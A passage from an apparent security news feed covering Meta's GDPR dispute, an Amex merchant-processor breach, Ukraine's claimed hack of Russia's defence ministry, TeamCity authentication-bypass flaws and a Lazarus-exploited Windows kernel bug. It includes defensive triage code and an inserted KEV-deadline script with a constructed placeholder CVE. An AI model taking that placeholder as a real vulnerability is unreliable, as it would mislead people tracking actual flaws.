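    for key, value in triage().items():
        print(f"{key}: {value}")
```

A raw socket owned by a legitimate daemon (tcpdump, some VPN or monitoring agents) is normal, so the socket list is a lead to combine with the parent-process and file checks rather than an alert on its own.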

The researcher also shared YARA rules for this threat.


    Pierluigi Paganini

    (SecurityAffairs – hacking, backdoor)

    META hit with privacy complaints by EU consumer groups

    4 March 2024 at 13:31

    This is my interview with TRT International on the Meta dispute with EU consumer groups, which are calling on the bloc to sanction the company

    EU consumer groups are calling on the bloc to sanction the company Meta – which owns Facebook, Instagram and WhatsApp – for allegedly breaching privacy rules. Earlier this week, Meta announced it will set up a team to tackle disinformation and the abuse of generative AI in the run-up to the European Parliament elections – amid concerns about fake news. Abdulvehab Ejupi, a journalist at TRT International, reports.

    Below are the questions and answers of my interview:

    What specific GDPR rules do the consumer groups claim Meta is not complying with?
    Consumer groups assert that Meta is not adhering to various rules established by the European privacy regulation GDPR:

    1. Fair Processing (Article 5(1)(a)): Personal data must be processed lawfully, fairly, and transparently. Consumer groups claim that Meta’s data collection is unfair and lacks transparency. They also allege that the social network giant potentially includes hidden clauses or misleading explanations about data usage.
    2. Data Minimization: Meta is expected to collect limited personal data for a specific scope authorized by users. Consumer groups claim that Meta collects more data than necessary for its stated purposes.
    3. Purpose Limitation (Article 5(1)(b)): Personal data must be collected for specified, explicit, and legitimate purposes. According to GDPR, Meta needs to have a legitimate reason, such as explicit consent, contractual necessity, or legal obligation, to collect and use individuals’ data.

    Regardless, I emphasize that, according to GDPR, Meta needs a legitimate reason to collect and use individuals’ data, such as explicit consent, contractual necessity, or a legal obligation.

    How does the European Consumer Organisation view Meta’s data processing practices in relation to surveillance-based business models?

    The European Consumer Organization strongly opposes Meta’s business model for data collection and processing. They perceive this approach as inconsistent with the core rules of GDPR and believe it represents a serious threat to individual privacy rights.

    What has been the criticism regarding Meta’s recent launch of paid, ad-free subscriptions in Europe, and how does Meta defend this move?

Critics argue that Meta is charging users for a basic privacy setting while still collecting extensive data. On the other hand, Meta contends that their subscription model is a legal and compliant response to evolving regulations regarding user consent and data processing.

    Below is the video of my interview:

    In 2023, the European Union fined Meta $1.3 billion for transferring user data to the US. This is the biggest fine since the adoption of the General Data Protection Regulation (GDPR) by the European Union (EU) on May 25, 2018.


    Pierluigi Paganini

    (SecurityAffairs – hacking, privacy)

    Some American Express customers’ data exposed in a third-party data breach

    4 March 2024 at 19:58

    American Express warns customers that their credit cards were exposed due to a data breach experienced by a third-party merchant processor.

    American Express (Amex) notifies customers that their credit card information has been compromised in a data breach involving a third-party merchant processor. The company did not disclose the number of impacted customers.

    “We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system.” reads the data breach notification sent to the impacted customers. “Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure.”

    The security breach occurred at a service provider that lets customers book flights, hotels and other reservations using an online portal. The hacked third-party merchant processor was processing American Express Card member data. 

    Exposed data includes current or previously issued Amex Card account numbers, customer names and other Card information such as the expiration date.

    The company recommends that customers vigilantly monitor their accounts for fraud and suspicious transactions. Amex told customers that they would not be responsible for any fraudulent charges on their accounts.

    Amex recommends customers review their account statements over the next 12 to 24 months and enable instant notifications via the company’s mobile app to receive notifications about potential suspicious activity.


    Pierluigi Paganini

    (SecurityAffairs – hacking, data breach)

    Ukraine’s GUR hacked the Russian Ministry of Defense

    5 March 2024 at 06:25

    The Main Intelligence Directorate (GUR) of Ukraine’s Ministry of Defense claims that it hacked the Russian Ministry of Defense.

    The Main Intelligence Directorate (GUR) of Ukraine’s Ministry of Defense announced it had breached the Russian Ministry of Defense servers as part of a special operation, and exfiltrated confidential documents.

    Stolen documents include:

    • confidential documents, including orders and reports circulated among over 2000 structural units of the Russian military service.
    • software used by the Russian Ministry of Defense to encrypt and protect its data.
    • a collection of secret service documents belonging to the Russian Ministry of War.

    The stolen documents allowed intelligence analysts of Ukraine’s GUR to delineate the comprehensive structure of the Russian Ministry of Defense system and its various units.

    Russian Ministry of Defense

    The documents revealed the leadership of the Russian Ministry, including other high-ranking officials within the divisions of the Russian Ministry of Defense. This encompasses deputies, assistants, and specialists, individuals who used the electronic document management system known as ‘bureaucrat.’

    “Cyber specialists of the Ministry of Defense of Ukraine implemented another successful special operation against the aggressor state of Russia – as a result of the attack, it was possible to gain access to the servers of the Ministry of Defense of the Russian Federation.” reads the press release published by Ukraine’s GUR. “Now the Ukrainian special service has the information protection and encryption software used by the morph, as well as an array of secret service documents of the Russian Ministry of War.”

    According to the press release, the GUR also stole the documents belonging to the Deputy Minister of Defense of the Russian Federation, Timur Vadimovich Ivanov.

    In November, Ukraine’s intelligence service announced they had hacked Russia’s Federal Air Transport Agency, ‘Rosaviatsia.’ The attack is the result of another complex special cyber operation.

    Rosaviatsia is the government agency responsible for the oversight and regulation of civil aviation in Russia. The agency’s primary role is to ensure the safety, security, and efficiency of air transport within the country.

    The state-sponsored hackers claimed to have stolen sensitive documents that contained proof of a crisis in Russia’s aviation industry.

    The announcement marked the first time that a government admitted to having used hacking as part of its military strategy during a conflict.


    Pierluigi Paganini

    (SecurityAffairs – hacking, data breach)

    Experts disclosed two severe flaws in JetBrains TeamCity On-Premises software

    5 March 2024 at 08:17

    Two new security flaws in JetBrains TeamCity On-Premises software can allow attackers to take over affected systems.

    Rapid7 researchers disclosed two new critical security vulnerabilities, tracked as CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3), in JetBrains TeamCity On-Premises.

    An attacker can exploit the vulnerabilities to take control of affected systems.

    Below are the descriptions for these vulnerabilities:

    • CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical).
    • CVE-2024-27199 is an authentication bypass vulnerability in the web component of TeamCity that arises from a path traversal issue (CWE-22) and has a CVSS base score of 7.3 (High).

    “The vulnerabilities may enable an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server.” reads the advisory published by JetBrains.

    The flaws impact all TeamCity On-Premises versions through 2023.11.3; they were addressed with the release of version 2023.11.4.

    The company also released a security patch plugin for those customers who are unable to patch their systems.

    The two flaws were discovered by Stephen Fewer, Principal Security Researcher at Rapid7, and were disclosed following Rapid7’s vulnerability disclosure policy.

    Rapid7 published a detailed analysis of the two flaws here.

    Describing the flaw CVE-2024-27198, the researchers pointed out that an unauthenticated attacker can use a specially crafted URL to bypass all authentication checks. A remote unauthenticated attacker can exploit this flaw to take complete control of a vulnerable TeamCity server.

    Recently JetBrains addressed another critical vulnerability in TeamCity servers, tracked as CVE-2024-23917 (CVSS score: 9.8), that could be exploited by an unauthenticated attacker to gain administrative control of servers.


    Pierluigi Paganini

    (SecurityAffairs – hacking, JetBrains)

    CISA adds Microsoft Windows Kernel bug used by Lazarus APT to its Known Exploited Vulnerabilities catalog

    5 March 2024 at 15:14

    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft Windows Kernel vulnerability to its Known Exploited Vulnerabilities catalog.

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2024-21338 (CVSS Score 7.8) Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

    An attacker can exploit this vulnerability to gain SYSTEM privileges. To take advantage of this vulnerability, a threat actor must first log in to the system. They could then execute a specially crafted application designed to exploit the vulnerability and assume control of the compromised system.

    The vulnerability was discovered by Jan Vojtěšek from Avast.

    At the end of February, Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. 

    The zero-day, tracked as CVE-2024-21338 has been addressed by Microsoft in the February Patch Tuesday update.

    The nation-state actors exploited the zero-day to gain kernel-level access and disable security software. In past attacks threat actors achieved the same goal by using much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary. 

    Lazarus exploited the vulnerability CVE-2024-21338 to perform direct kernel object manipulation in an updated version of their FudModule rootkit.

    The flaw CVE-2024-21338 resides within the IOCTL (Input and Output Control) dispatcher of the driver appid.sys. This driver is a core component of the AppLocker application, which is used to control which apps and files users can run. 

    Lazarus exploited the zero-day in the appid.sys driver by manipulating the Input and Output Control (IOCTL) dispatcher. This manipulation allows them to execute arbitrary code on the target system, bypassing security measures.

    According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

    Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

    CISA orders federal agencies to fix this vulnerability by March 25, 2024.
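    As an added example (not from the article or from CISA), the following Python triages a constructed excerpt in the shape of CISA's public KEV JSON feed against the BOD 22-01 due date quoted above. The field names follow the real feed; the placeholder second entry, the inventory set and the 30-day warning window are assumptions.

```python
"""Added example: rank KEV entries present in your environment by BOD 22-01 due date."""
import json
from datetime import date

# Constructed excerpt mirroring the layout of CISA's known_exploited_vulnerabilities.json.
# The CVE-2024-21338 entry uses the due date cited in the article; the second entry is a
# made-up placeholder (not a real CVE) used only to show an overdue case.
KEV_EXCERPT = json.dumps({
    "vulnerabilities": [
        {
            "cveID": "CVE-2024-21338",
            "vendorProject": "Microsoft",
            "product": "Windows",
            "vulnerabilityName": "Microsoft Windows Kernel Exposed IOCTL with "
                                 "Insufficient Access Control Vulnerability",
            "dueDate": "2024-03-25",
        },
        {
            "cveID": "CVE-0000-00000",  # constructed placeholder entry
            "vendorProject": "ExampleVendor",
            "product": "ExampleProduct",
            "vulnerabilityName": "Constructed placeholder entry",
            "dueDate": "2024-01-31",
        },
    ]
})


def triage_kev(feed_json, inventory, today_iso, horizon_days=30):
    """Return KEV entries whose cveID is in `inventory` (CVEs known to affect your
    own assets), annotated with days left to the BOD 22-01 due date. A negative
    value means the deadline has already passed. Most urgent entries come first."""
    today = date.fromisoformat(today_iso)
    findings = []
    for entry in json.loads(feed_json)["vulnerabilities"]:
        if entry["cveID"] not in inventory:
            continue
        remaining = (date.fromisoformat(entry["dueDate"]) - today).days
        status = ("OVERDUE" if remaining < 0
                  else "DUE_SOON" if remaining <= horizon_days
                  else "SCHEDULED")
        findings.append({"cve": entry["cveID"],
                         "product": f'{entry["vendorProject"]} {entry["product"]}',
                         "due": entry["dueDate"],
                         "days_remaining": remaining,
                         "status": status})
    return sorted(findings, key=lambda f: f["days_remaining"])


if __name__ == "__main__":
    # Assumed inventory: both excerpt CVEs are present; run as of the article date.
    for f in triage_kev(KEV_EXCERPT, {"CVE-2024-21338", "CVE-0000-00000"}, "2024-03-05"):
        print(f'{f["status"]:9} {f["cve"]:15} due {f["due"]} ({f["days_remaining"]:+d} days) {f["product"]}')
```

    Pointing the function at the live feed instead of the excerpt only changes the source of `feed_json`; the inventory set is what ties the catalog to assets you actually run.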


    Pierluigi Paganini

    (SecurityAffairs – ransomware, Lazarus) 
